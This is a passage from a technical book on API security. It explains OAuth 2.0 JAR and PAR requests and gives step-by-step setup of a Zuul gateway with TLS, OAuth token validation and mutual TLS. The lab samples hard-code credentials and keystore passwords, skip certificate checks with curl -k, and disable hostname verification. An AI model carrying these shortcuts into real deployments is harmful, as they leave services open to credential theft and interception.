profile mandates using tls during the entire flow secret key goes on the wire (Bearer token profile) Chapter 4 Oauth 2.0 Fundamentals 97 Note Oauth 2.0 introduces a clear separation between the client, the resource owner, the authorization server, and the resource server. But the core Oauth 2.0 specification doesn’t talk about how the resource server validates an access token. most Oauth implementations started doing this by talking to a proprietary apI exposed by the authorization server. the Oauth 2.0 token Introspection profile standardized this to some extent, and in Chapter 9, we talk more about it. JWT Secured Authorization Request (JAR) In an OAuth 2.0 request to the authorize endpoint of the authorization server, all the request parameters flow via the browser as query parameters. The following is an example of an OAuth 2.0 authorization code grant request: https://authz.example.com/oauth2/authorize? response_type=token& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback There are a couple of issues with this approach. Since these parameters flow via the browser, the end user or anyone on the browser can change the input parameters that could result in some unexpected outcomes at the authorization server. At the same time, since the request is not integrity protected, the authorization server has no means to validate who initiated the request. With JSON Web Token (JWT) secured authorization requests, we can overcome these two issues. If you are new to JWT, please check Chapters 7 and 8. JSON Web Token (JWT) defines a container to transport data between interested parties in a cryptographically safe manner. The JSON Web Signature (JWS) specification developed under the IETF JOSE working group, represents a message or a payload, which is digitally signed or MACed (when a hashing algorithm is used with HMAC), while the JSON Web Encryption (JWE) specification standardizes a way to represent an encrypted payload. One of the draft proposals1 to the IETF OAuth working group suggests to introduce the ability to send request parameters in a JWT, which allows the request to be signed 1 The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR). Chapter 4 Oauth 2.0 Fundamentals 98 with JWS and encrypted with JWE so that the integrity, source authentication, and confidentiality properties of the authorization request are preserved. At the time of writing, this proposal is in its very early stage—and if you are familiar with Security Assertion Markup Language (SAML) Single Sign-On, this is quite analogous to the signed authentication requests in SAML. The following shows the decoded payload of a sample authorization request, which ideally goes within a JWT: { "iss": "s6BhdRkqt3", "aud": "https://server.example.com", "response_type": "code id_token", "client_id": "s6BhdRkqt3", "redirect_uri": "https://client.example.org/cb", "scope": "openid", "state": "af0ifjsldkj", "nonce": "n-0S6_WzA2Mj", "max_age": 86400 } Once the client application constructs the JWT (a JWS or a JWE—please see Chapters 7 and 8 for the details), it can send the authorization request to the OAuth authorization server in two ways. One way is called passing by value, and the other is passing by reference. The following shows an example of passing by value, where the client application sends the JWT in a query parameter called request. The [jwt_assertion] in the following request represents either the actual JWS or JWE. https://server.example.com/authorize?request=[jwt_assertion] The draft proposal for JWT authorization request introduces the pass by reference method to overcome some of the limitations in the pass by value method, as listed here: • Many mobile phones in the market as of this writing still do not accept large payloads. The payload restriction is typically either 512 or 1024 ASCII characters. • The maximum URL length supported by older versions of the Internet Explorer is 2083 ASCII characters. Chapter 4 Oauth 2.0 Fundamentals 99 • On a slow connection such as a 2G mobile connection, a large URL would cause a slow response. Therefore the use of such is not advisable from the user experience point of view. The following shows an example of pass by reference, where the client application sends a link in the request, which can be used by the authorization server to fetch the JWT. This is a typical OAuth 2.0 authorization code request, along with the new request_ uri query parameter. The value of the request_uri parameter carries a link pointing to the corresponding JWS or JWE. https://server.example.com/authorize? response_type=code& client_id=s6BhdRkqt3& request_uri=https://tfp.example.org/request.jwt/Schjwew& state=af0ifjsldkj Pushed Authorization Requests (PAR) This is another draft proposal being discussed under the IETF OAuth working group at the moment, which complements the JWT Secured Authorization Request (JAR) approach we discussed in the previous section. One issue with JAR is each client has to expose an endpoint directly to the authorization server. This is the endpoint that hosts the corresponding JWT, which is used by the authorization server. With Pushed Authorization Requests (PAR) draft proposal, this requirement goes a way. PAR defines an endpoint at the authorization server end, where each client can directly push (without going through the browser) all the parameters in a typical OAuth 2.0 authorization request and then use the normal authorization flow via the browser to pass a reference to the pushed request. Following is an example, where the client application pushes authorization request parameters to an endpoint hosted at the authorization server. This push endpoint on the authorization server can be secured either with mutual Transport Layer Security (TLS) or with OAuth 2.0 itself (client credentials) or with any other means as agreed between the client application and the authorization server. POST /as/par HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded Authorization: Basic czZCaGRSa3F0Mzo3RmpmcDBaQnIxS3REUmJuZlZkbUl3 Chapter 4 Oauth 2.0 Fundamentals 100 response_type=code& state=af0ifjsldkj& client_id=s6BhdRkqt3& redirect_uri=https%3A%2F%2Fclient.example.org%2Fcb& scope=ais If the client follows the JAR specification which, we discussed in the previous section, it can also send a JWS or a JWE to the push endpoint in the following way. POST /as/par HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded Authorization: Basic czZCaGRSa3F0Mzo3RmpmcDBaQnIxS3REUmJuZlZkbUl3 request=[jwt_assertion] Once the push endpoint at the authorization server receives the preceding request, it has to carry out all the validation checks against the request that it usually performs against a typical authorization request. If it all looks good, the authorization server responds with the following. The value of the request_uri parameter in the response is bound to the client_id in the request and acts as a reference to the authorization request. HTTP/1.1 201 Created Date: Tue, 2 Oct 2019 15:22:31 GMT Content-Type: application/json { "request_uri": "urn:example:bwc4JK-ESC0w8acc191e-Y1LTC2", "expires_in": 3600 } Upon receiving the push response from the authorization server, the client application can construct the following request with the request_uri parameter from the response to redirect the user to the authorization server. https://server.example.com/authorize? request_uri=urn:example:bwc4JK-ESC0w8acc191e-Y1LTC2 Chapter 4 Oauth 2.0 Fundamentals 101 Summary • OAuth 2.0 is the de facto standard for securing APIs, and it primarily solves the access delegation problem. • A grant type in OAuth 2.0 defines how a client can obtain an authorization grant from a resource owner to access a resource on his/her behalf. • OAuth 2.0 core specification defines five grant types: authorization code, implicit, password, client credentials, and refresh. • Refresh grant type is a special grant type, which is used by an OAuth 2.0 client application to renew an expired or closer to expiry access token. • Implicit grant type and client credentials grant types do not return back any refresh tokens. • Implicit grant type is obsolete and is not recommended to use due to its own inherent security issues. • OAuth 2.0 supports two types of client applications: public clients and confidential clients. Single-page applications and native mobile applications fall under public clients, while web applications fall under confidential clients. • The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR) draft proposal suggests to introduce the ability to send request parameters in a JWT. • The Pushed Authorization Requests (PAR) draft proposal suggests to introduce a push endpoint at the authorization server end, so the client applications can securely push all the authorization request parameters and then initiate the browser-based login flow. Chapter 4 Oauth 2.0 Fundamentals 103 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_5 CHAPTER 5 Edge Security with  an API Gateway The API gateway is the most common pattern in securing APIs in a production deployment. In other words, it’s the entry point to your API deployment. There are many open source and proprietary products out there, which implement the API gateway pattern, which we commonly identify as API gateways. An API gateway is a policy enforcement point (PEP), which centrally enforces authentication, authorization, and throttling policies. Further we can use an API gateway to centrally gather all the analytics related to APIs and publish those to an analytics product for further analysis and presentation. Setting Up Zuul API Gateway Zuul1 is an API gateway (see Figure 5-1) that provides dynamic routing, monitoring, resiliency, security, and more. It is acting as the front door to Netflix’s server infrastructure, handling traffic from all Netflix users around the world. It also routes requests, supports developers’ testing and debugging, provides deep insight into Netflix’s overall service health, protects the Netflix deployment from attacks, and channels traffic to other cloud regions when an Amazon Web Services (AWS) region is in trouble. In this section, we are going to set up Zuul as an API gateway to front the Order API, which we developed in Chapter 3. 1 https://github.com/Netflix/zuul 104 All the samples used in this book are available in the https://github.com/ apisecurity/samples.git git repository. Use the following git command to clone it. All the samples related to this chapter are inside the directory ch05. To run the samples in the book, we assumed you have installed Java (JDK 1.8+) and Apache Maven 3.2.0+. \> git clone https://github.com/apisecurity/samples.git \> cd samples/ch05 Running the Order API This is the simplest API implementation ever, which is developed with Java Spring Boot. In fact one can call it as a microservice as well. You can find the code inside the directory, ch05/sample01. To build the project with Maven, use the following command from the sample01 directory: \> cd sample01 \> mvn clean install Figure 5-1. A typical Zuul API gateway deployment at Netflix. All the Netflix microservices are fronted by an API gateway Chapter 5 edge SeCurity with an api gateway 105 Now, let’s see how to run our Spring Boot service and talk to it with a cURL client. Execute the following command from ch05/sample01 directory to start the Spring Boot service with Maven. \> mvn spring-boot:run To test the API with a cURL client, use the following command from a different command console. It will print the output as shown in the following, after the initial command. \> curl http://localhost:8080/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type": "VISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Running the Zuul API Gateway In this section, we are going to build the Zuul API gateway as a Spring Boot project and run it against the Order service. Or in other words, the Zuul gateway will proxy all the requests to the Order service. You can find the code inside ch05/sample02 directory. To build the project with Maven, use the following commands: \> cd sample02 \> mvn clean install Before we delve deep into the code, let’s have a look at some of the notable Maven dependencies and plugins added into ch05/sample02/pom.xml. Spring Boot comes with different starter dependencies to integrate with different Spring modules. The spring- cloud-starter-zuul dependency (as shown in the following) brings in Zuul API gateway dependencies and does all the wiring between the components, making the developer’s work to a minimum. <dependency> <groupId>org.springframework.cloud</groupId> <artifactId>spring-cloud-starter-zuul</artifactId> </dependency> Chapter 5 edge SeCurity with an api gateway 106 It is important to have a look at the class file src/main/java/com/apress/ch05/ sample02/GatewayApplication.java. This is the class which spins up the Zuul API gateway. By default it starts on port 8080, and you can change the port by adding, say, for example, server.port=9000 to the src/main/resources/application.properties file. This will set the API gateway port to 9000. The following shows the code snippet from GatewayApplication class, which spins up the API gateway. The @EnableZuulProxy annotation instructs the Spring framework to start the Spring application as a Zuul proxy. @EnableZuulProxy @SpringBootApplication public class GatewayApplication { public static void main(String[] args) { SpringApplication.run(GatewayApplication.class, args); } } Now, let’s see how to start the API gateway and talk to it with a cURL client. The following command executed from ch05/sample02 directory shows how to start the API gateway with Maven. Since the Zuul API gateway is also another Spring Boot application, the way you start it is the same as how we did before with the Order service. \> mvn spring-boot:run To test the Order API, which is now proxied through the Zuul API gateway, let’s use the following cURL. It will print the output as shown in the following. Also make sure that the Order service is still up and running on port 8080. Here we add a new context called retail (which we didn’t see in the direct API call) and talk to the port 9090, where the API gateway is running. \> curl http://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type": "VISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Chapter 5 edge SeCurity with an api gateway 107 What Happens Underneath? When the API gateway receives a request to the retail context, it routes the request to the back-end API. These routing instructions are set in the src/main/resources/ application.properties file, as shown in the following. If you want to use some other context, instead of retail, then you need to change the property key appropriately. zuul.routes.retail.url=http://localhost:8080 Enabling TLS for the Zuul API Gateway In the previous section, the communication between the cURL client and the Zuul API gateway happened over HTTP, which is not secure. In this section, let’s see how to enable Transport Layer Security (TLS) at the Zuul API gateway. In Chapter 3, we discussed how to secure the Order service with TLS. There the Order service is a Java Spring Boot application, and we follow the same process here to secure the Zuul API gateway with TLS, as Zuul is also another Java Spring Boot application. To enable TLS, first we need to create a public/private key pair. The following command uses keytool that comes with the default Java distribution to generate a key pair and stores it in keystore.jks file. If you are to use the keystore.jks file as it is, which is inside sample02 directory, you can possibly skip this step. Chapter 3 explains in detail what each parameter in the following command means. \> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=zool,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot To enable TLS for the Zuul API gateway, copy the keystore file (keystore.jks), which we created earlier, to the home directory of the gateway (e.g., ch05/sample02/) and add the following to the [SAMPLE_HOME]/src/main/resources/application. properties file. The samples that you download from the samples git repository already have these values (and you only need to uncomment them), and we are using springboot as the password for both the keystore and the private key. server.ssl.key-store: keystore.jks server.ssl.key-store-password: springboot server.ssl.keyAlias: spring Chapter 5 edge SeCurity with an api gateway 108 To validate that everything works fine, use the following command from ch05/sample02/ directory to spin up the Zuul API gateway and notice the line, which prints the HTTPS port. If you already have the Zuul gateway running from the previous exercise, please shut it down first. \> mvn spring-boot:run Tomcat started on port(s): 9090 (https) with context path " Assuming you already have the Order service still running from the previous section, run the following cURL command to access the Order service via the Zuul gateway, over HTTPS. \> curl –k https://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} We used the -k option in the preceding cURL command. Since we have self-signed (untrusted) certificates to secure our HTTPS endpoint, we need to pass the –k parameter to advise cURL to ignore the trust validation. In a production deployment with proper certificate authority–signed certificates, you do not need to do that. Also, if you have self- signed certificates, you can still avoid using –k, by pointing cURL to the corresponding public certificate. \> curl --cacert ca.crt https://localhost:9090/retail/order/11 You can use the following keytool command from ch05/sample02/ to export the public certificate of the Zuul gateway to ca.crt file in PEM (with the -rfc argument) format. \> keytool -export -file ca.crt -alias spring –rfc -keystore keystore.jks -storePass springboot The preceding command will result in the following error. This complains that the common name in certificate, which is zool, does not match with the hostname (localhost) in the cURL command. curl: (51) SSL: certificate subject name 'zool' does not match target host name 'localhost' Chapter 5 edge SeCurity with an api gateway 109 Ideally, in a production deployment when you create a certificate, its common name should match the hostname. In this case, since we do not have Domain Name Service (DNS) entry for the zool hostname, you can use the following workaround, with cURL. \> curl --cacert ca.crt https://zool:9090/retail/order/11 --resolve zool:9090:127.0.0.1 Enforcing OAuth 2.0 Token Validation at the Zuul API Gateway In the previous section, we explained how to proxy requests to an API, via the Zuul API gateway. There we didn’t worry about enforcing security. In this section, we will discuss how to enforce OAuth 2.0 token validation at the Zuul API gateway. There are two parts in doing that. First we need to have an OAuth 2.0 authorization server (also we can call it a security token service) to issue tokens, and then we need to enforce OAuth token validation at the Zuul API gateway (see Figure 5-2). Figure 5-2. The Zuul API gateway intercepts all the requests going to the Order API and validates OAuth 2.0 access tokens against the authorization server (STS) Chapter 5 edge SeCurity with an api gateway 110 Setting Up an OAuth 2.0 Security Token Service (STS) The responsibility of the security token service (STS) is to issue tokens to its clients and respond to the validation requests from the API gateway. There are many open source OAuth 2.0 authorization servers out there: WSO2 Identity Server, Keycloak, Gluu, and many more. In a production deployment, you may use one of them, but for this example, we are setting up a simple OAuth 2.0 authorization server with Spring Boot. It is another microservice and quite useful in developer testing. The code corresponding to the authorization server is under ch05/sample03 directory. Let’s have a look at ch05/sample03/pom.xml for notable Maven dependencies. These dependencies introduce a new set of annotations (@EnableAuthorizationServer annotation and @EnableResourceServer annotation), to turn a Spring Boot application to an OAuth 2.0 authorization server. <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-security</artifactId> </dependency> <dependency> <groupId>org.springframework.security.oauth</groupId> <artifactId>spring-security-oauth2</artifactId> </dependency> The class sample03/src/main/java/com/apress/ch05/sample03/TokenServiceApp. java carries the @EnableAuthorizationServer annotation, which turns the project into an OAuth 2.0 authorization server. We’ve added @EnableResourceServer annotation to the same class, as it also has to act as a resource server, to validate access tokens and return back the user information. It’s understandable that the terminology here is a little confusing, but that’s the easiest way to implement the token validation endpoint (in fact the user info endpoint, which also indirectly does the token validation) in Spring Boot. When you use self-contained access tokens (JWTs), this token validation endpoint is not required. If you are new to JWT, please check Chapter 7 for details. The registration of clients with the Spring Boot authorization server can be done in multiple ways. This example registers clients in the code itself, in sample03/src/ main/java/com/apress/ch05/sample03/config/AuthorizationServerConfig. java file. The AuthorizationServerConfig class extends the AuthorizationServerConfigurerAdapter class to override its default behavior. Here Chapter 5 edge SeCurity with an api gateway 111 we set the value of client id to 10101010, client secret to 11110000, available scope values to foo and/or bar, authorized grant types to client_credentials, password, and refresh_token, and the validity period of an access token to 6000 seconds. Most of the terms we use here are from OAuth 2.0 and explained in Chapter 4. @Override public void configure(ClientDetailsServiceConfigurer clients) throws Exception { clients.inMemory().withClient("10101010") .secret("11110000").scopes("foo", "bar") .authorizedGrantTypes("client_credentials", "password", "refresh_token") .accessTokenValiditySeconds(6000); } To support password grant type, the authorization server has to connect to a user store. A user store can be a database or an LDAP server, which stores user credentials and attributes. Spring Boot supports integration with multiple user stores, but once again, the most convenient one, which is just good enough for this example, is an in- memory user store. The following code from sample03/src/main/java/com/apress/ ch05/sample03/config/WebSecurityConfiguration.java file adds a user to the system, with the role USER. @Override public void configure(AuthenticationManagerBuilder auth) throws Exception { auth.inMemoryAuthentication() .withUser("peter").password("peter123").roles("USER"); } Once we define the in-memory user store in Spring Boot, we also need to engage that with the OAuth 2.0 authorization flow, as shown in the following, in the code sample03/ src/main/java/com/apress/ch05/sample03/config/AuthorizationServerConfig. java. @Autowired private AuthenticationManager authenticationManager; @Override Chapter 5 edge SeCurity with an api gateway 112 public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception { endpoints.authenticationManager(authenticationManager); } To start the authorization server, use the following command from ch05/sample03/ directory to spin up the TokenService microservice, and it starts running on HTTPS port 8443. \> mvn spring-boot:run Testing OAuth 2.0 Security Token Service (STS) To get an access token using the OAuth 2.0 client credentials grant type, use the following command. Make sure to replace the values of $CLIENTID and $CLIENTSECRET appropriately. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively. Also you might have noticed already, the STS endpoint is protected with Transport Layer Security (TLS). To protect STS with TLS, we followed the same process we did before while protecting the Zuul API gateway with TLS. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=client_ credentials&scope=foo" https://localhost:8443/oauth/token {"access_token":"81aad8c4-b021-4742-93a9-e25920587c94","token_ type":"bearer","expires_in":43199,"scope":"foo"} Note we use the –k option in the preceding curL command. Since we have self-signed (untrusted) certificates to secure our httpS endpoint, we need to pass the –k parameter to advise curL to ignore the trust validation. you can find more details regarding the parameters used here from the Oauth 2.0 6749 rFC: https://tools.ietf.org/html/rfc6749 and also explained in Chapter 4. To get an access token using the password OAuth 2.0 grant type, use the following command. Make sure to replace the values of $CLIENTID, $CLIENTSECRET, $USERNAME, and $PASSWORD appropriately. The hard-coded values for client id and client secret Chapter 5 edge SeCurity with an api gateway 113 used in our example are 10101010 and 11110000, respectively; and for username and password, we use peter and peter123, respectively. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=passwor d&username=$USERNAME&password=$PASSWORD&scope=foo" https://localhost:8443/ oauth/token {"access_token":"69ff86a8-eaa2-4490-adda-6ce0f10b9f8b","token_ type":"bearer","refresh_token":"ab3c797b-72e2-4a9a-a1c5- c550b2775f93","expires_in":43199,"scope":"foo"} Note if you carefully observe the two responses we got for the Oauth 2.0 client credentials grant type and the password grant type, you might have noticed that there is no refresh token in the client credentials grant type flow. in Oauth 2.0, the refresh token is used to obtain a new access token, when the access token has expired or is closer to expire. this is quite useful, when the user is offline and the client application has no access to his/her credentials to get a new access token and the only way is to use a refresh token. For the client credentials grant type, there is no user involved, and it always has access to its own credentials, so can be used any time it wants to get a new access token. hence, a refresh token is not required. Now let’s see how to validate an access token, by talking to the authorization server. The resource server usually does this. An interceptor running on the resource server intercepts the request, extracts out the access token, and then talks to the authorization server. In a typical API deployment, this validation happens over a standard endpoint exposed by the OAuth authorization server. This is called the introspection endpoint, and in Chapter 9, we discuss OAuth token introspection in detail. However, in this example, we have not implemented the standard introspection endpoint at the authorization server (or the STS), but rather use a custom endpoint for token validation. The following command shows how to directly talk to the authorization server to validate the access token obtained in the previous command. Make sure to replace the value of $TOKEN with the corresponding access token appropriately. Chapter 5 edge SeCurity with an api gateway 114 \> curl -k -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://localhost:8443/user {"details":{"remoteAddress":"0:0:0:0:0:0:0:1","sessionId":null,"tokenValue": "9f3319a1-c6c4-4487-ac3b-51e9e479b4ff","tokenType":"Bearer","decodedDetails": null},"authorities":[],"authenticated":true,"userAuthentication":null, "credentials":"","oauth2Request":{"clientId":"10101010","scope":["bar"], "requestParameters":{"grant_type":"client_credentials","scope":"bar"}, "resourceIds":[],"authorities":[],"approved":true,"refresh":false,"redirect Uri":null,"responseTypes":[],"extensions":{},"grantType":"client_credentials", "refreshTokenRequest":null},"clientOnly":true,"principal":"10101010", "name":"10101010"} The preceding command returns back the metadata associated with the access token, if the token is valid. The response is built inside the user() method of sample03/ src/main/java/com/apress/ch05/sample03/TokenServiceApp.java class, as shown in the following code snippet. With the @RequestMapping annotation, we map the /user context (from the request) to the user() method. @RequestMapping("/user") public Principal user(Principal user) { return user; } Note By default, with no extensions, Spring Boot stores issued tokens in memory. if you restart the server after issuing a token, and then validate it, it will result in an error response. Setting Up Zuul API Gateway for OAuth 2.0 Token Validation To enforce token validation at the API gateway, we need to uncomment the following property in sample02/src/main/resources/application.properties file, as shown in the following. The value of the security.oauth2.resource.user-info-uri property carries the endpoint of the OAuth 2.0 security token service, which is used to validate tokens. security.oauth2.resource.user-info-uri=https://localhost:8443/user Chapter 5 edge SeCurity with an api gateway 115 The preceding property points to an HTTPs endpoint on the authorization server. To support the HTTPS connection between the Zuul gateway and the authorization server, there is one more change we need to do at the Zuul gateway end. When we have a TLS connection between the Zuul gateway and the authorization server, the Zuul gateway has to trust the certificate authority associated with the public certificate of the authorization server. Since we are using self-signed certificate, we need to export authorization server’s public certificate and import it to Zuul gateway’s keystore. Let’s use the following keytool command from ch05/sample03 directory to export authorization server’s public certificate and copy it to ch05/sample02 directory. If you are using keystores from the samples git repo, then you may skip the following two keytool commands. \> keytool -export -alias spring -keystore keystore.jks -storePass springboot -file sts.crt Certificate stored in file <sts.crt> \> cp sts.crt ../sample02 Let’s use the following keytool command from ch05/sample02 directory to import security token service’s public certificate to Zuul gateway’s keystore. \> keytool -import -alias sts -keystore keystore.jks -storePass springboot -file sts.crt Trust this certificate? [no]:yes Certificate was added to keystore We also need to uncomment the following two dependencies in the sample02/pom. xml file. These dependencies do the autowiring between Spring Boot components to enforce OAuth 2.0 token validation at the Zuul gateway. <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-jwt</artifactId> </dependency> <dependency> <groupId>org.springframework.security.oauth</groupId> <artifactId>spring-security-oauth2</artifactId> </dependency> Chapter 5 edge SeCurity with an api gateway 116 Finally, we need to uncomment the @EnableResourceServer annotation and the corresponding package import on the GatewayApplication (ch05/sample02/ GatewayApplication.java) class. Let’s run the following command from the ch05/sample02 directory to start the Zuul API gateway. In case it is running already, you need to stop it first. Also, please make sure sample01 (Order service) and sample03 (STS) are still up and running. \> mvn spring-boot:run To test the API, which is now proxied through the Zuul API gateway and secured with OAuth 2.0, let’s use the following cURL. It should fail, because we do not pass an OAuth 2.0 token. \> curl –k https://localhost:9090/retail/order/11 Now let’s see how to invoke the API properly with a valid access token. First we need to talk to the security token service and get an access token. Make sure to replace the values of $CLIENTID, $CLIENTSECRET, $USERNAME, and $PASSWORD appropriately in the following command. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively; and for username and password, we used peter and peter123, respectively. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=passwor d&username=$USERNAME&password=$PASSWORD&scope=foo" https://localhost:8443/ oauth/token {"access_token":"69ff86a8-eaa2-4490-adda-6ce0f10b9f8b","token_ type":"bearer","refresh_token":"ab3c797b-72e2-4a9a-a1c5- c550b2775f93","expires_in":43199,"scope":"foo"} Now let’s use the access token from the preceding response to invoke the Order API. Make sure to replace the value of $TOKEN with the corresponding access token appropriately. \> curl -k -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/ json" https://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type": "VISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Chapter 5 edge SeCurity with an api gateway 117 Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Enabling Mutual TLS Between Zuul API Gateway and Order Service So far in this chapter, we have protected the communication between the cURL client and STS, cURL client and Zuul API gateway, and Zuul API gateway and STS over TLS. Still we have a weak link in our deployment (see Figure 5-3). The communication between the Zuul gateway and Order service is neither protected with TLS nor authentication. In other words, if someone can bypass the gateway, they can reach the Order server with no authentication. To fix this, we need to secure the communication between the gateway and the Order service over mutual TLS. Then, no other request can reach the Order service without going through the gateway. Or in other words, the Order service only accepts requests generated from the gateway. Figure 5-3. The Zuul API gateway intercepts all the requests going to the Order API and validates OAuth 2.0 access tokens against the authorization server (STS) Chapter 5 edge SeCurity with an api gateway 118 To enable mutual TLS between the gateway and the Order service, first we need to create a public/private key pair. The following command uses keytool that comes with the default Java distribution to generate a key pair and stores it in keystore.jks file. Chapter 3 explains in detail what each parameter in the following command means. If you are using keystores from the samples git repo, then you may skip the following keytool commands. \> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=order,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot To enable mutual TLS for the Order service, copy the keystore file (keystore. jks), which we created earlier, to the home directory of the Order service (e.g., ch05/ sample01/) and add the following to the [SAMPLE_HOME]/src/main/resources/ application.properties file. The samples that you download from the samples git repository already have these values (and you only need to uncomment them), and we are using springboot as the password for both the keystore and the private key. The server.ssl.client-auth parameter is used to enforce mutual TLS at the Order service. server.ssl.key-store: keystore.jks server.ssl.key-store-password: springboot server.ssl.keyAlias: spring server.ssl.client-auth:need There are two more changes we need to do at the Order service end. When we enforce mutual TLS at the Order service, the Zuul gateway (which acts as a client to the Order service) has to authenticate itself with an X.509 certificate—and the Order service must trust the certificate authority associated with Zuul gateway’s X.509 certificate. Since we are using self-signed certificate, we need to export Zuul gateway’s public certificate and import it to the Order service’s keystore. Let’s use the following keytool command from ch05/sample02 directory to export Zuul gateway’s public certificate and copy it to ch05/sample01 directory. \> keytool -export -alias spring -keystore keystore.jks -storePass springboot -file zuul.crt Certificate stored in file <zuul.crt> \> cp zuul.crt ../sample01 Chapter 5 edge SeCurity with an api gateway 119 Let’s use the following keytool command from ch05/sample01 directory to import Zuul gateway’s public certificate to Order service’s keystore. \> keytool -import -alias zuul -keystore keystore.jks -storePass springboot -file zuul.crt Trust this certificate? [no]:yes Certificate was added to keystore Finally, when we have a TLS connection between the Zuul gateway and the Order service, the Zuul gateway has to trust the certificate authority associated with the public certificate of the Order service. Even though we do not enable mutual TLS between these two parties, we still need to satisfy this requirement to enable just TLS. Since we are using self-signed certificate, we need to export Order service’s public certificate and import it to Zuul gateway’s keystore. Let’s use the following keytool command from ch05/sample01 directory to export Order service’s public certificate and copy it to ch05/sample02 directory. \> keytool -export -alias spring -keystore keystore.jks -storePass springboot -file order.crt Certificate stored in file <order.crt> \> cp order.crt ../sample02 Let’s use the following keytool command from ch05/sample02 directory to import Order service’s public certificate to Zuul gateway’s keystore. \> keytool -import -alias order -keystore keystore.jks -storePass springboot -file order.crt Trust this certificate? [no]:yes Certificate was added to keystore To validate that TLS works fine with the Order service, use the following command from ch05/sample01/ directory to spin up the Order service and notice the line, which prints the HTTPS port. If you already have the Order service running from the previous exercise, please shut it down first. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path " Since we updated the Order service endpoint to use HTTPS instead of HTTP, we also need to update the Zuul gateway to use the new HTTPS endpoint. These routing instructions are set in the ch05/sample02/src/main/resources/application. Chapter 5 edge SeCurity with an api gateway 120 properties file, as shown in the following. Just update it to use HTTPS instead of HTTP. Also we need to uncomment the zuul.sslHostnameValidationEnabled property in the same file and set it to false. This is to ask Spring Boot to ignore hostname verification. Or in other words, now Spring Boot won’t check whether the hostname of the Order service matches the common name of the corresponding public certificate. zuul.routes.retail.url=https://localhost:8080 zuul.sslHostnameValidationEnabled=false Restart the Zuul gateway with the following command from ch05/sample02. \> mvn spring-boot:run Assuming you have authorization server up and running, on HTTPS port 8443, run the following command to test the end-to-end flow. First we need to talk to the security token service and get an access token. Make sure to replace the values of $CLIENTID, $CLIENTSECRET, $USERNAME, and $PASSWORD appropriately in the following command. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively; and for username and password, we used peter and peter123, respectively. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=passwor d&username=$USERNAME&password=$PASSWORD&scope=foo" https://localhost:8443/ oauth/token {"access_token":"69ff86a8-eaa2-4490-adda-6ce0f10b9f8b","token_ type":"bearer","refresh_token":"ab3c797b-72e2-4a9a-a1c5- c550b2775f93","expires_in":43199,"scope":"foo"} Now let’s use the access token from the preceding response to invoke the Order API. Make sure to replace the value of $TOKEN with the corresponding access token appropriately. \> curl -k -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/ json" https://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Chapter 5 edge SeCurity with an api gateway 121 Securing Order API with Self-Contained Access Tokens An OAuth 2.0 bearer token can be a reference token or self-contained token. A reference token is an arbitrary string. An attacker can carry out a brute-force attack to guess the token. The authorization server must pick the right length and use other possible measures to prevent brute forcing. A self-contained access token is a JSON Web Token (JWT), which we discuss in Chapter 7. When the resource server gets an access token, which is a reference token, then to validate the token, it has to talk to the authorization server (or the token issuer). When the access token is a JWT, the resource server can validate the token by itself, by verifying the signature of the JWT. In this section, we discuss how to obtain a JWT access token from the authorization server and use it to access the Order service through the Zuul API gateway. Setting Up an Authorization Server to Issue JWT In this section, we’ll see how to extend the authorization server we used in the previous section (ch05/sample03/) to support self-contained access tokens or JWTs. The first step is to create a new key 